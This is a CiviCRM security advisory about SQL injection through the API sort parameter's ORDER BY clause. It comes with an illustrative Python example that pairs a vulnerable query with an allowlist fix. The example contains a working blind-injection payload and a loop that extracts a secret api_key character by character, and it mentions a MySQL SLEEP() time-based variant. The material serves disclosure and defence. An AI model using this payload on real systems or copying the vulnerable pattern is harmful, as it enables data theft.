When generating an API query, the ORDER BY clause for some entities was not correctly validated and escaped before being interpolated into the SQL statement. A caller who controls the sort parameter could therefore inject arbitrary SQL expressions into the ORDER BY position, which may have permitted data disclosure via time-based blind SQL injection.
This is mitigated by the fact that exploitation requires API access; the injection point is not reachable by unauthenticated users.
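The following is an added example, not CiviCRM code, that models the vulnerable pattern described above and the allowlist-based validation that fixes it. It uses an in-memory SQLite table with constructed sample rows; the table and column names, the `civicrm_contact` stand-in, and the helper names are assumptions for illustration. Because SQLite has no SLEEP(), the blind oracle shown is boolean (the injected CASE expression flips the row order depending on a guess about secret data); in MySQL, the same ORDER BY position accepts `IF(cond, SLEEP(5), 0)`, which is the time-based variant the advisory refers to.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for an entity table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE civicrm_contact "
        "(id INTEGER PRIMARY KEY, display_name TEXT, api_key TEXT)"
    )
    conn.executemany(
        "INSERT INTO civicrm_contact VALUES (?, ?, ?)",
        [(1, "Alice", "k3y-secret"), (2, "Bob", "zzz"), (3, "Carol", "aaa")],
    )
    return conn


def vulnerable_query(conn, sort):
    """VULNERABLE: the caller-supplied sort string is interpolated unvalidated,
    so any SQL expression is accepted in the ORDER BY position."""
    rows = conn.execute(f"SELECT id FROM civicrm_contact ORDER BY {sort}")
    return [r[0] for r in rows]


# Hardened variant: only known column names and an optional direction.
ALLOWED_SORT_FIELDS = {"id", "display_name"}
SORT_TERM_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)(?:\s+(ASC|DESC))?$", re.I)


def safe_query(conn, sort):
    """Validate each comma-separated sort term against an allowlist of columns
    and reject anything that is not '<column> [ASC|DESC]'."""
    terms = []
    for part in sort.split(","):
        part = part.strip()
        m = SORT_TERM_RE.match(part)
        if not m or m.group(1).lower() not in ALLOWED_SORT_FIELDS:
            raise ValueError(f"invalid sort term: {part!r}")
        direction = (m.group(2) or "ASC").upper()
        terms.append(f"{m.group(1).lower()} {direction}")
    # Only allowlisted identifiers reach the query string, so interpolation is safe here.
    rows = conn.execute(f"SELECT id FROM civicrm_contact ORDER BY {', '.join(terms)}")
    return [r[0] for r in rows]


def safe_query_rejects(conn, sort):
    """True if the hardened query refuses the given sort string."""
    try:
        safe_query(conn, sort)
    except ValueError:
        return True
    return False


def blind_payload(guess):
    """Boolean-oracle injection for the ORDER BY position: rows come back
    ascending if the guessed first character of row 1's api_key is right,
    descending otherwise. In MySQL this would be IF(cond, SLEEP(5), 0)."""
    return (
        "CASE WHEN (SELECT substr(api_key, 1, 1) FROM civicrm_contact WHERE id = 1)"
        f" = '{guess}' THEN id ELSE -id END"
    )


def extract_first_char_vulnerable(conn):
    """Recover the first character of row 1's api_key through the vulnerable
    sort parameter, one guess per query, by observing which row sorts first."""
    for c in "abcdefghijklmnopqrstuvwxyz0123456789":
        if vulnerable_query(conn, blind_payload(c))[0] == 1:
            return c
    return None


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable sort:", extract_first_char_vulnerable(db))
    print("hardened sort rejects payload:", safe_query_rejects(db, blind_payload("k")))
    print("hardened sort, legitimate input:", safe_query(db, "display_name DESC, id"))
```

The extraction loop runs one query per candidate character; a real time-based attack would do the same with a SLEEP() in the true branch and measure response latency instead of row order. The fix is not escaping but allowlisting: an ORDER BY term is an identifier, and identifiers cannot be protected by quoting data, so the only safe input is one that matches a known column name.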
Affected versions:
- 4.7.13 and earlier
- 4.6.23 and earlier
Fixed versions:
- 4.7.14
- 4.6.24
Solution:
- Upgrade to the latest CiviCRM version
- Apply the following patch if you cannot upgrade: https://github.com/civicrm/civicrm-core/pull/9343
Credits:
- Mattias Michaux for reporting the issue
- Seamus Lee for fixing the issue